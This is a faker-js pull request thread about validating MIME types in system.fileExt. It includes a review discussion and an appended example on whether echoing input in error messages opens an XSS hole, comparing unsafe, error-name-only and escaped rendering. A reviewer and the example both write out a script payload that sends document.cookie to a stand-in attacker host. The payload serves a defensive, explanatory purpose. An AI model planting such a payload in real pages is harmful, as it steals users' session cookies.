
fix: validate unsupported fileExt mime types#3879

Open
hiSandog wants to merge 1 commit into
faker-js:nextfrom
hiSandog:fix/system-fileext-validation-20260602

Conversation

@hiSandog
Contributor

@hiSandog hiSandog commented Jun 2, 2026

Summary

  • throw a FakerError when system.fileExt receives an unsupported MIME type
  • add test coverage for unsupported MIME type input

Validation

  • pnpm exec vitest run test/modules/system.spec.ts
  • pnpm exec eslint src/modules/system/index.ts test/modules/system.spec.ts

@hiSandog hiSandog requested a review from a team as a code owner June 2, 2026 06:21
@netlify

netlify Bot commented Jun 2, 2026

Deploy Preview for fakerjs ready!

Built without sensitive environment variables

Latest commit: 1a9c873
Latest deploy log: https://app.netlify.com/projects/fakerjs/deploys/6a1e76604b4aa7000864ff63
Deploy Preview: https://deploy-preview-3879.fakerjs.dev

@codecov

codecov Bot commented Jun 2, 2026

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 98.92%. Comparing base (5bd8709) to head (1a9c873).

Additional details and impacted files
@@           Coverage Diff           @@
##             next    #3879   +/-   ##
=======================================
  Coverage   98.92%   98.92%           
=======================================
  Files         908      908           
  Lines        3159     3162    +3     
  Branches      581      582    +1     
=======================================
+ Hits         3125     3128    +3     
  Misses         30       30           
  Partials        4        4           
Files with missing lines | Coverage Δ
src/modules/system/index.ts | 100.00% <100.00%> (ø)

@ST-DDT ST-DDT added labels Jun 2, 2026: p: 1-normal (Nothing urgent), c: refactor (PR that affects the runtime behavior, but doesn't add new features or fixes bugs), m: system (Something is referring to the system module)
@ST-DDT ST-DDT added this to the v10.x milestone Jun 2, 2026
@matthewmayer
Contributor

What was the old behavior?

@ST-DDT
Member

ST-DDT commented Jun 3, 2026

Old:
[image]

New:
[image]

Maybe put foo/the mime type in 'quotes'?

@matthewmayer
Contributor

Is including user input in error messages a potential XSS vector?

like what if someone passes

faker.system.fileExt("<script>fetch('http://attacker.com/steal?cookie=' + document.cookie)</script>")

and then a website naively renders the error message in HTML causing the payload to execute.

@ST-DDT
Member

ST-DDT commented Jun 3, 2026

IMO not. Adding arbitrary text as HTML is the issue, not some code throwing an error message containing something that looks like a script.

@xDivisionByZerox
Member

Can this affect the API docs by any chance? We are inserting the return values of our functions as HTML into the DOM.

if (resultLines.length === 1) {
  domLine.insertAdjacentHTML('beforeend', newCommentSpan(resultLines[0]));
} else {
  for (const line of resultLines.reverse()) {
    domLine.insertAdjacentHTML('afterend', newCommentLine(line));
  }
}

@ST-DDT
Member

ST-DDT commented Jun 4, 2026

`try { result.push($1); } catch (error: unknown) { result.push(error instanceof Error ? error.name : 'Error'); console.log('Error in example for ${name}:', error); }\n`

We add the error type not the error message. In addition to that we check our examples for malicious code anyway.

@xDivisionByZerox
Member

We add the error type not the error message.

I wasn't aware of it. That's why I was asking. Thanks for pointing that out.

In addition to that we check our examples for malicious code anyway.

I guess you refer to manual checks? Or in the refreshable code component? If the first thing is true, a malicious example might still be provided as a PR and automatically deployed to netlify. Sure, that is not the main Faker webpage, but still a page running under the faker domain.
But as you said, the error message does not get put into the DOM, so that shouldn't be a concern for now.

@ST-DDT
Member

ST-DDT commented Jun 4, 2026

I guess you refer to manual checks?

Yes

If the first thing is true, a malicious example might still be provided as a PR and automatically deployed to netlify.

The same is true for all PRs. A PR can disable or remove any security check we have. If that is a concern for you, maybe enable copilot reviews for all PRs.
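The following is an added example, not faker's own code, illustrating the two points of this thread together: a lookup that throws when given an unsupported MIME type (the behavior the PR adds to system.fileExt), and what happens when a docs page turns the resulting error into HTML through an HTML-parsing API such as insertAdjacentHTML. The `FakerError` class, the tiny `MIME_TO_EXT` table, the `fileExt` function, the three `renderExample*` functions and the constructed payload are all assumptions made for the example; the real module, error class and docs runner differ. The "by name" renderer mirrors the pattern ST-DDT quotes (only `error.name` reaches the DOM), the "escaped" renderer shows the alternative if the message itself had to be displayed, and the "unsafe" renderer shows why interpolating `error.message` into markup would be the actual XSS sink rather than the throw itself.

```javascript
// Added example (assumption throughout; not faker's code).

// Stand-in for FakerError (assumption).
class FakerError extends Error {
  constructor(message) {
    super(message);
    this.name = 'FakerError';
  }
}

// Constructed, deliberately tiny MIME type -> extension table (assumption;
// the real module's table is much larger).
const MIME_TO_EXT = {
  'application/json': 'json',
  'image/png': 'png',
  'text/plain': 'txt',
};

// Hypothetical stand-in for system.fileExt: returns an extension for a known
// MIME type and throws a FakerError quoting the input otherwise.
function fileExt(mimeType) {
  const ext = MIME_TO_EXT[mimeType];
  if (ext === undefined) {
    throw new FakerError(`Unsupported MIME type: '${mimeType}'`);
  }
  return ext;
}

// Minimal HTML escaping for text that is handed to an HTML-parsing API
// (insertAdjacentHTML / innerHTML). When a node is built directly,
// textContent is the simpler option and needs no escaping at all.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Unsafe pattern: the raw result or error message is interpolated into markup
// that will later be parsed as HTML, so anything in the input becomes live
// markup. This is the sink the thread is asking about.
function renderExampleUnsafe(fn) {
  try {
    return `<span class="comment">${fn()}</span>`;
  } catch (error) {
    const message = error instanceof Error ? error.message : String(error);
    return `<span class="comment">${message}</span>`;
  }
}

// Pattern described in the thread: only the error's name reaches the DOM and
// the full error goes to the console, so the attacker-controlled message is
// never part of the inserted HTML.
function renderExampleByName(fn) {
  try {
    return `<span class="comment">${escapeHtml(fn())}</span>`;
  } catch (error) {
    const name = error instanceof Error ? error.name : 'Error';
    console.log('Error in example:', error);
    return `<span class="comment">${name}</span>`;
  }
}

// Escaping variant for the case where the message itself should be shown.
function renderExampleEscaped(fn) {
  try {
    return `<span class="comment">${escapeHtml(fn())}</span>`;
  } catch (error) {
    const message = error instanceof Error ? error.message : String(error);
    return `<span class="comment">${escapeHtml(message)}</span>`;
  }
}

// Constructed payload, the same shape as the one raised in the thread.
const PAYLOAD =
  "<script>fetch('http://attacker.com/steal?cookie=' + document.cookie)</script>";

// Stand-alone demonstration.
console.log('known:   ', renderExampleByName(() => fileExt('image/png')));
console.log('unsafe:  ', renderExampleUnsafe(() => fileExt(PAYLOAD)));
console.log('by name: ', renderExampleByName(() => fileExt(PAYLOAD)));
console.log('escaped: ', renderExampleEscaped(() => fileExt(PAYLOAD)));
```

Run with `node` to see the three renderings side by side: only the unsafe variant produces a string containing a live `<script>` element; the by-name variant emits just `FakerError`, and the escaped variant keeps the quoted MIME type visible as inert text. The check is worth keeping in mind for any place that inserts example output, not only error paths, which is why both safe renderers escape the successful result as well.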
